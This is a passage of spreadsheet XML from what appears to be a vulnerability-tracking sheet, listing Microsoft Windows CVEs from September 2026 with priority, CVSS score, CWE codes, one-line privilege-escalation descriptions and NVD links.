          <t>HIGH</t>
        </is>
      </c>
      <c r="F948" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G948" s="5" t="inlineStr"/>
      <c r="H948" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I948" s="5" t="inlineStr"/>
      <c r="J948" s="5" t="inlineStr"/>
      <c r="K948" s="5" t="inlineStr"/>
      <c r="L948" s="5" t="inlineStr"/>
      <c r="M948" s="5" t="inlineStr"/>
      <c r="N948" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O948" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P948" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q948" s="5" t="inlineStr"/>
      <c r="R948" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-367</t>
        </is>
      </c>
      <c r="S948" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T948" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69563</t>
        </is>
      </c>
    </row>
    <row r="949">
      <c r="A949" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B949" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C949" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69564</t>
        </is>
      </c>
      <c r="D949" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E949" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F949" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G949" s="5" t="inlineStr"/>
      <c r="H949" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I949" s="5" t="inlineStr"/>
      <c r="J949" s="5" t="inlineStr"/>
      <c r="K949" s="5" t="inlineStr"/>
      <c r="L949" s="5" t="inlineStr"/>
      <c r="M949" s="5" t="inlineStr"/>
      <c r="N949" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O949" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P949" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q949" s="5" t="inlineStr"/>
      <c r="R949" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S949" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Online Certificate Status Protocol (OCSP) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T949" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69564</t>
        </is>
      </c>
    </row>
    <row r="950">
      <c r="A950" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B950" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C950" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69567</t>
        </is>
      </c>
      <c r="D950" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E950" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F950" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G950" s="5" t="inlineStr"/>
      <c r="H950" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I950" s="5" t="inlineStr"/>
      <c r="J950" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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50" s="5" t="inlineStr"/>
      <c r="M950" s="5" t="inlineStr"/>
      <c r="N950" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O950" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P950" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q950" s="5" t="inlineStr"/>
      <c r="R950" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S950" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T950" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69567</t>
        </is>
      </c>
    </row>
    <row r="951">
      <c r="A951" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B951" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C951" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69573</t>
        </is>
      </c>
      <c r="D951" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E951" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F951" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G951" s="5" t="inlineStr"/>
      <c r="H951" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I951" s="5" t="inlineStr"/>
      <c r="J951" s="5" t="inlineStr"/>
      <c r="K951" s="5" t="inlineStr"/>
      <c r="L951" s="5" t="inlineStr"/>
      <c r="M951" s="5" t="inlineStr"/>
      <c r="N951" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O951" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P951" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q951" s="5" t="inlineStr"/>
      <c r="R951" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S951" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Universal Disk Format File System Driver (UDFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T951" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69573</t>
        </is>
      </c>
    </row>
    <row r="952">
      <c r="A952" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B952" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C952" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69574</t>
        </is>
      </c>
      <c r="D952" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E952" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F952" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G952" s="5" t="inlineStr"/>
      <c r="H952" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I952" s="5" t="inlineStr"/>
      <c r="J952" s="5" t="inlineStr"/>
      <c r="K952" s="5" t="inlineStr"/>
      <c r="L952" s="5" t="inlineStr"/>
      <c r="M952" s="5" t="inlineStr"/>
      <c r="N952" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O952" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P952" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q952" s="5" t="inlineStr"/>
      <c r="R952" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S952" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T952" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69574</t>
        </is>
      </c>
    </row>
    <row r="953">
      <c r="A953" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B953" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C953" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69575</t>
        </is>
      </c>
      <c r="D953" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E953" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F953" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G953" s="5" t="inlineStr"/>
      <c r="H953" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I953" s="5" t="inlineStr"/>
      <c r="J953" s="5" t="inlineStr"/>
      <c r="K953" s="5" t="inlineStr"/>
      <c r="L953" s="5" t="inlineStr"/>
      <c r="M953" s="5" t="inlineStr"/>
      <c r="N953" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O953" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P953" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q953" s="5" t="inlineStr"/>
      <c r="R953" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S953" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Storage Spaces Controller allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T953" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69575</t>
        </is>
      </c>
    </row>
    <row r="954">
      <c r="A954" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B954" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C954" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69578</t>
        </is>
      </c>
      <c r="D954" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E954" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F954" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G954" s="5" t="inlineStr"/>
      <c r="H954" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I954" s="5" t="inlineStr"/>
      <c r="J954" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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54" s="5" t="inlineStr"/>
      <c r="M954" s="5" t="inlineStr"/>
      <c r="N954" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O954" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P954" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q954" s="5" t="inlineStr"/>
      <c r="R954" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="S954" s="5" t="inlineStr">
        <is>
          <t>Numeric truncation error in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T954" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69578</t>
        </is>
      </c>
    </row>
    <row r="955">
      <c r="A955" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B955" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C955" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69581</t>
        </is>
      </c>
      <c r="D955" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E955" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F955" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G955" s="5" t="inlineStr"/>
      <c r="H955" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I955" s="5" t="inlineStr"/>
      <c r="J955" s="5" t="inlineStr"/>
      <c r="K955" s="5" t="inlineStr"/>
      <c r="L955" s="5" t="inlineStr"/>
      <c r="M955" s="5" t="inlineStr"/>
      <c r="N955" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O955" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P955" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q955" s="5" t="inlineStr"/>
      <c r="R955" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="S955" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T955" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69581</t>
        </is>
      </c>
    </row>
    <row r="956">
      <c r="A956" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B956" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C956" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69600</t>
        </is>
      </c>
      <c r="D956" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E956" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F956" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G956" s="5" t="inlineStr"/>
      <c r="H956" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I956" s="5" t="inlineStr"/>
      <c r="J956" s="5" t="inlineStr"/>
      <c r="K956" s="5" t="inlineStr"/>
      <c r="L956" s="5" t="inlineStr"/>
      <c r="M956" s="5" t="inlineStr"/>
      <c r="N956" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O956" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P956" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q956" s="5" t="inlineStr"/>
      <c r="R956" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S956" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T956" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69600</t>
        </is>
      </c>
    </row>
    <row r="957">
      <c r="A957" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B957" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C957" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69605</t>
        </is>
      </c>
      <c r="D957" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E957" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F957" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G957" s="5" t="inlineStr"/>
      <c r="H957" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I957" s="5" t="inlineStr"/>
      <c r="J957" s="5" t="inlineStr"/>
      <c r="K957" s="5" t="inlineStr"/>
      <c r="L957" s="5" t="inlineStr"/>
      <c r="M957" s="5" t="inlineStr"/>
      <c r="N957" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O957" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P957" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q957" s="5" t="inlineStr"/>
      <c r="R957" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S957" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Install Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T957" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69605</t>
        </is>
      </c>
    </row>
    <row r="958">
      <c r="A958" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B958" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C958" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69606</t>
        </is>
      </c>
      <c r="D958" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E958" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F958" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G958" s="5" t="inlineStr"/>
      <c r="H958" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I958" s="5" t="inlineStr"/>
      <c r="J958" s="5" t="inlineStr"/>
      <c r="K958" s="5" t="inlineStr"/>
      <c r="L958" s="5" t="inlineStr"/>
      <c r="M958" s="5" t="inlineStr"/>
      <c r="N958" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O958" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P958" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q958" s="5" t="inlineStr"/>
      <c r="R958" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S958" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Shell allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T958" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69606</t>
        </is>
      </c>
    </row>
    <row r="959">
      <c r="A959" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B959" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C959" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69610</t>
        </is>
      </c>
      <c r="D959" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E959" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F959" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G959" s="5" t="inlineStr"/>
      <c r="H959" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I959" s="5" t="inlineStr"/>
      <c r="J959" s="5" t="inlineStr"/>
      <c r="K959" s="5" t="inlineStr"/>
      <c r="L959" s="5" t="inlineStr"/>
      <c r="M959" s="5" t="inlineStr"/>
      <c r="N959" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O959" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P959" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q959" s="5" t="inlineStr"/>
      <c r="R959" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S959" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T959" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69610</t>
        </is>
      </c>
    </row>
    <row r="960">
      <c r="A960" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B960" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C960" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69611</t>
        </is>
      </c>
      <c r="D960" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E960" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F960" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G960" s="5" t="inlineStr"/>
      <c r="H960" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I960" s="5" t="inlineStr"/>
      <c r="J960" s="5" t="inlineStr"/>
      <c r="K960" s="5" t="inlineStr"/>
      <c r="L960" s="5" t="inlineStr"/>
      <c r="M960" s="5" t="inlineStr"/>
      <c r="N960" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O960" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P960" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q960" s="5" t="inlineStr"/>
      <c r="R960" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S960" s="5" t="inlineStr">
        <is>
          <t>Use after free in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T960" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69611</t>
        </is>
      </c>
    </row>
    <row r="961">
      <c r="A961" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B961" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C961" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69613</t>
        </is>
      </c>
      <c r="D961" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E961" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F961" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G961" s="5" t="inlineStr"/>
      <c r="H961" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I961" s="5" t="inlineStr"/>
      <c r="J961" s="5" t="inlineStr"/>
      <c r="K961" s="5" t="inlineStr"/>
      <c r="L961" s="5" t="inlineStr"/>
      <c r="M961" s="5" t="inlineStr"/>
      <c r="N961" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O961" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P961" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q961" s="5" t="inlineStr"/>
      <c r="R961" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S961" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Image Acquisition allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T961" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69613</t>
        </is>
      </c>
    </row>
    <row r="962">
      <c r="A962" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B962" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C962" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69617</t>
        </is>
      </c>
      <c r="D962" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E962" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F962" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G962" s="5" t="inlineStr"/>
      <c r="H962" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I962" s="5" t="inlineStr"/>
      <c r="J962" s="5" t="inlineStr"/>
      <c r="K962" s="5" t="inlineStr"/>
      <c r="L962" s="5" t="inlineStr"/>
      <c r="M962" s="5" t="inlineStr"/>
      <c r="N962" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O962" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P962" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q962" s="5" t="inlineStr"/>
      <c r="R962" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S962" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Resilient File System (ReFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T962" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69617</t>
        </is>
      </c>
    </row>
    <row r="963">
      <c r="A963" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B963" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C963" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69621</t>
        </is>
      </c>
      <c r="D963" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E963" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F963" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G963" s="5" t="inlineStr"/>
      <c r="H963" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I963" s="5" t="inlineStr"/>
      <c r="J963" s="5" t="inlineStr"/>
      <c r="K963" s="5" t="inlineStr"/>
      <c r="L963" s="5" t="inlineStr"/>
      <c r="M963" s="5" t="inlineStr"/>
      <c r="N963" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O963" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P963" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q963" s="5" t="inlineStr"/>
      <c r="R963" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S963" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Fax Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T963" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69621</t>
        </is>
      </c>
    </row>
    <row r="964">
      <c r="A964" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B964" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C964" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69630</t>
        </is>
      </c>
      <c r="D964" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E964" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F964" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G964" s="5" t="inlineStr"/>
      <c r="H964" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I964" s="5" t="inlineStr"/>
      <c r="J964" s="5" t="inlineStr"/>
      <c r="K964" s="5" t="inlineStr"/>
      <c r="L964" s="5" t="inlineStr"/>
      <c r="M964" s="5" t="inlineStr"/>
      <c r="N964" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O964" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P964" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q964" s="5" t="inlineStr"/>
      <c r="R964" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S964" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T964" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69630</t>
        </is>
      </c>
    </row>
    <row r="965">
      <c r="A965" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B965" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C965" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69645</t>
        </is>
      </c>
      <c r="D965" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E965" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F965" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G965" s="5" t="inlineStr"/>
      <c r="H965" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I965" s="5" t="inlineStr"/>
      <c r="J965" s="5" t="inlineStr"/>
      <c r="K965" s="5" t="inlineStr"/>
      <c r="L965" s="5" t="inlineStr"/>
      <c r="M965" s="5" t="inlineStr"/>
      <c r="N965" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O965" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P965" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q965" s="5" t="inlineStr"/>
      <c r="R965" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S965" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Message Queuing allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T965" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69645</t>
        </is>
      </c>
    </row>
    <row r="966">
      <c r="A966" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B966" s="5" t="inlineStr">
